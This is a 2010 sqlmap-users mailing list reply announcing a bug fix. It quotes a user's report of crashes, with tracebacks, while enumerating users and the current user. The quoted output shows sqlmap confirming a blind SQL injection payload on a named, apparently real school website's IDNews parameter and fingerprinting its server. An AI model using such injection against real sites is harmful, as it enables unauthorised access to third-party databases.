Hi Alessio.
I've replied to you yesterday privately, but just to be official, fixed and
committed.
KR
On Sat, Dec 25, 2010 at 9:49 AM, Alessio Dalla Piazza <
ale...@gm...> wrote:
> whit args --users
> sqlmap version: 0.9-dev
> Python version: 2.6.6
> Operating system: posix
> Traceback (most recent call last):
> File "sqlmap.py", line 79, in main
> start()
> File "/home/clshack/sqlmap/lib/controller/controller.py", line 401, in
> start
> action()
> File "/home/clshack/sqlmap/lib/controller/action.py", line 77, in action
> conf.dumper.users(conf.dbmsHandler.getUsers())
> File "/home/clshack/sqlmap/plugins/generic/enumeration.py", line 149, in
> getUsers
> rootQuery = queries[kb.dbms].users
> File "/home/clshack/sqlmap/extra/xmlobject/xmlobject.py", line 369, in
> __getattr__
> raise AttributeError(attr)
> AttributeError: users
>
> [*] shutting down at: 09:46:34
>
>
> And:
> clshack@clshackUB:~/sqlmap$ python sqlmap.py -u
> http://www.marconivr.it/include/newsreader.asp?IDNews=298 --current-user
>
> sqlmap/0.9-dev - automatic SQL injection and database takeover tool
> http://sqlmap.sourceforge.net
>
> [*] starting at: 09:46:19
>
> [09:46:19] [INFO] using '/home/clshack/sqlmap/output/
> www.marconivr.it/session' as session file
> [09:46:19] [INFO] resuming injection data from session file
> [09:46:19] [INFO] resuming back-end DBMS 'microsoft access' from session
> file
> [09:46:19] [INFO] testing connection to the target url
> sqlmap identified the following injection points with 0 HTTP(s) requests:
> ---
> Place: GET
> Parameter: IDNews
> Type: boolean-based blind
> Title: AND boolean-based blind - WHERE clause
> Payload: IDNews=298 AND 6823=6823
> ---
>
> [09:46:20] [INFO] the back-end DBMS is Microsoft Access
> web server operating system: Windows 2003
> web application technology: ASP.NET, Microsoft IIS 6.0, ASP
> back-end DBMS: Microsoft Access
> [09:46:20] [INFO] fetching current user
>
> [09:46:20] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run
> with the latest development version from the Subversion repository. If the
> exception persists, please send by e-mail to
> sql...@li... the command line, the following text
> and any information needed to reproduce the bug. The developers will try to
> reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 0.9-dev
> Python version: 2.6.6
> Operating system: posix
> Traceback (most recent call last):
> File "sqlmap.py", line 79, in main
> start()
> File "/home/clshack/sqlmap/lib/controller/controller.py", line 401, in
> start
> action()
> File "/home/clshack/sqlmap/lib/controller/action.py", line 68, in action
> conf.dumper.currentUser(conf.dbmsHandler.getCurrentUser())
> File "/home/clshack/sqlmap/plugins/generic/enumeration.py", line 111, in
> getCurrentUser
> query = queries[kb.dbms].current_user.query
> File "/home/clshack/sqlmap/extra/xmlobject/xmlobject.py", line 369, in
> __getattr__
> raise AttributeError(attr)
> AttributeError: query
>
> [*] shutting down at: 09:46:20
>
> Happy Christmas and Happy new year--
> Alessio Dalla Piazza
> *http://www.clshack.it* <http://www.clshack.it>
>
> Contributor at *BackBox* Linux
> http://www.backbox.org
>
>
>
> ------------------------------------------------------------------------------
> Learn how Oracle Real Application Clusters (RAC) One Node allows customers
> to consolidate database storage, standardize their database environment,
> and,
> should the need arise, upgrade to a full multi-node Oracle RAC database
> without downtime or disruption
> http://p.sf.net/sfu/oracle-sfdevnl
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
--
Miroslav Stampar
E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
|
